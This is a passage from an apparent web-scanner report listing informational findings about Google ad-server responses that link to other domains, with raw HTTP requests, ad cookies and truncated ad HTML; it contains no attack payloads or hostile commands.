GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303760684&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Freflected-xss-dynamically-evaluated-expression-style-attribute-to-introduce-arbirary-javascript-shoppingnetsuitecom.html&dt=1303742684517&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303742684539&frm=0&adk=1607234649&ga_vid=273394407.1303742685&ga_sid=1303742685&ga_hid=12397547&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&eid=33895132&fu=0&ifi=1&dtd=80&xpc=wTS936Gnpy&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:44:33 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4639

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/reflected-xss-dynamically-evaluated-expression-style-attribute-to-introduce-arbirary-javascript-shoppingnetsuitecom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.FullSail.edu%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGpHBaNIZ8uAAtlrAq_XZ6rgDf35A" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

22.16. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303756477&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Fsql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm&dt=1303738508150&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303738508337&frm=0&adk=1819763764&ga_vid=462818616.1303738508&ga_sid=1303738508&ga_hid=1973000711&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=965&fu=0&ifi=1&dtd=277&xpc=aKLTpShQKv&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 13:34:57 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12692

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/sql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dvulnerability.scan.qualys.com%26adT%3DFree%2BNetwork%2BScan%26adU%3Dwww.eEye.com/Free-Scanner/%26adT%3DFree%2BVulnerabilityScanner%26adU%3Dwww.clcillinois.edu%26adT%3DSr/Lead%2BWeb%2BDeveloper%26gl%3DUS&amp;usg=AFQjCNGPqnY5UG7u7Cc-bpkvGzBJ3JUqqA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.17. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303757158&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-javascript-double-quote-example-poc-hoursdeploycom.html&dt=1303739157768&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303739158761&frm=0&adk=1607234649&ga_vid=1027902251.1303739159&ga_sid=1303739159&ga_hid=375496671&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=965&fu=0&ifi=1&dtd=1514&xpc=qT0wDNmjtE&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 13:45:48 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4371

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/reflected-xss-cross-site-scripting-javascript-double-quote-example-poc-hoursdeploycom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DBIRT-Exchange.com/JBoss%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNH0-cW4j459O3JY9HOo2mnyhUiHDA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

22.18. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303758255&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-cwe-79-capec-86-hourly.deploy.com_443.htm&dt=1303740255147&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303740255194&frm=0&adk=1819763764&ga_vid=1938262857.1303740256&ga_sid=1303740256&ga_hid=1224938138&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&fu=0&ifi=1&dtd=784&xpc=ZGxB6Kj0D3&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:04:05 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4340

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-hourly.deploy.com_443.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Credant.com/Healthcare%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGN5LJ8qK09GbjbO3hx95bAsitUaA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

22.19. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303756505&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Fsql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm&dt=1303738505554&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303738505788&frm=0&adk=1819763764&ga_vid=413277210.1303738506&ga_sid=1303738506&ga_hid=678088752&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=965&eid=44901217%2C33895132&fu=0&ifi=1&dtd=331&xpc=ckA4kh6DtR&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 13:34:56 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/sql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3Dwww.checkmarx.com%26adT%3DSQL%2BInjection%2BTutorial%26gl%3DUS&amp;usg=AFQjCNHo7HQbxZHgN90066UkdYLmA9HNiA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.20. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303751190&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.html&dt=1303733223690&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303733223727&frm=0&adk=1607234649&ga_vid=700321566.1303733224&ga_sid=1303733224&ga_hid=1638361633&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1018&bih=978&fu=0&ifi=1&dtd=125&xpc=KPpLNnOf5F&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 12:06:53 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12736

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DCymphonix.com/Application%252BSecurity%26adT%3DApplication%2BSecurity%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3DPRWeb.com%26adT%3DPress%2BRelease%2BTemplates%26gl%3DUS&amp;usg=AFQjCNFiTNCYKiwvS0BXGBykLX8TGZTh0g" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.21. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:20:17 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1645

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=zczMzMzMCEDNzMzMzMwIQAAAAMDMzAhAzczMzMzMCEDNzMzMzMwIQOtg8QHzcr0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAArylOPgAAAAA.&tt_code=vert-105&udj=uf%28%27a%27%2C+9797%2C+1303741217%29%3Buf%28%27c%27%2C+45814%2C+1303741217%29%3Buf%28%27r%27%2C+173254%2C+1303741217%29%3Bppv%288991%2C+%271998880197657583851%27%2C+1303741217%2C+1303784417%2C+45814%2C+25553%29%3B&cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU.&referrer=http://games.webalta.ru/&pp=TbWDIAAIVuAK7GZH3ItXr3JmF2XbbmiM84zMSQ&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0xMTM0ODIyNjgyNTEwODc5oAHD8v3sA7IBEGdhbWVzLndlYmFsdGEucnW6AQoxNjB4NjAwX2FzyAEJ2gEYaHR0cDovL2dhbWVzLndlYmFsdGEucnUvmALWEsACBMgChdLPCqgDAegDaegD1AfoA8EC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyp--SO2lIMceltajJwn2qFCTNn3A%26client%3Dca-pub-1134822682510879%26adurl%3D"></script>
...[SNIP]...

22.22. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303757147&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-javascript-double-quote-example-poc-hoursdeploycom.html&dt=1303739163288&bpp=11&shv=r20110420&jsv=r20110415&correlator=1303739164172&frm=0&adk=1607234649&ga_vid=332023737.1303739165&ga_sid=1303739165&ga_hid=1647371635&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=965&eid=36815001&fu=0&ifi=1&dtd=1342&xpc=elXzaM1u1f&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 13:45:54 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12633

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/reflected-xss-cross-site-scripting-javascript-double-quote-example-poc-hoursdeploycom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dsupermicro.com/CloudServerChassis%26adT%3D2.5%2526quot%253B%2BHDD%2BServer%26adU%3Dvulnerability.management.qualys.com%26adT%3DVulnerability%2BManagement%26adU%3DBuyMcAfeeNow.com%26adT%3DMcAfee%25E2%2584%25A2%2BTotal%2BProtection%26gl%3DUS&amp;usg=AFQjCNFpCuEJSWNoPv_4EJdAl1_HAAJEkg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.23. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303758810&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Fhourlydeploycom%2Fcoldfusion-user-agent-cross-site-scripting-xss-http-header-injection-overflow-vulnerability-example-poc-report.html&dt=1303740840638&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303740840732&frm=0&adk=1607234649&ga_vid=583291703.1303740841&ga_sid=1303740841&ga_hid=96684719&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&fu=0&ifi=1&dtd=177&xpc=h1TVqbQmCu&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:13:50 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13110

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
